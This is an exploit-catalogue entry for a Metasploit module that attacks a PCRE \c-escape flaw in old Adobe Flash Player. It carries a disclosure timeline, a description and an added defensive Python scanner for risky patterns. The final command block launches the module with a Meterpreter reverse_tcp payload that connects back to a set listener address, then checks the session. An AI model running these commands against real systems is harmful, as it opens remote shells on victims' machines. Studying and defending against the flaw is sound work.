Timeline :
Vulnerability discovered and reported to the vendor by Mark Brand and Natalie Silvanovich of Google Project Zero on 2014-11-25
Patched by the vendor through APSB15-04 on 2015-02-05
Details of the vulnerability provided by Google Project Zero on 2015-02-12
PoC provided by :
Mark Brand
sinn3r
Reference(s) :
Affected version(s) :
Adobe Flash Player 16.0.0.296 and earlier versions
Tested on :
Windows 7 SP1 with Internet Explorer 8 and Adobe Flash Player 16.0.0.235
Description :
This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error in the PCRE engine, specifically in the handling of the \c escape sequence when followed by a multi-byte UTF-8 character, allows arbitrary execution of PCRE bytecode.
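A defensive check for the pattern shape described above, as an added example that is not part of the original page or of the Metasploit module: it scans a regular expression source string and reports every unescaped \c whose operand is a non-ASCII character. The function name and the sample patterns are constructed for illustration.

```python
# Constructed sample patterns (not taken from any exploit or from the page).
SAMPLES = [
    "\\cA",                      # ordinary control escape
    "\\c\u00e9",                 # \c followed by a two-byte UTF-8 character
    "\\\\c\u00e9",               # escaped backslash, then a literal "c"
    "\\Q\\c\u00e9\\E\\c\u20ac",  # literal \Q...\E span, then a real \c escape
]


def find_risky_control_escapes(pattern: str) -> list:
    """Return offsets of each \\c escape whose operand is a non-ASCII character.

    Any code point above U+007F needs more than one byte in UTF-8, which is
    the input shape the description above refers to.
    """
    hits = []
    i, n = 0, len(pattern)
    literal = False  # True inside \Q...\E, where backslashes are not escapes
    while i < n:
        if literal:
            if pattern.startswith("\\E", i):
                literal = False
                i += 2
            else:
                i += 1
        elif pattern[i] != "\\":
            i += 1
        elif i + 1 >= n:
            break  # trailing backslash, nothing to inspect
        elif pattern[i + 1] == "Q":
            literal = True
            i += 2
        elif pattern[i + 1] == "c":
            if i + 2 < n and ord(pattern[i + 2]) > 0x7F:
                hits.append(i)
            i += 3  # skip the operand so it cannot start another escape
        else:
            i += 2  # any other escape, including an escaped backslash
    return hits


if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), find_risky_control_escapes(sample))
```

A non-empty result marks a pattern worth rejecting or reviewing before it reaches a regex engine that has not been patched.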
Commands :
use exploit/windows/browser/adobe_flash_pcre
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run
getuid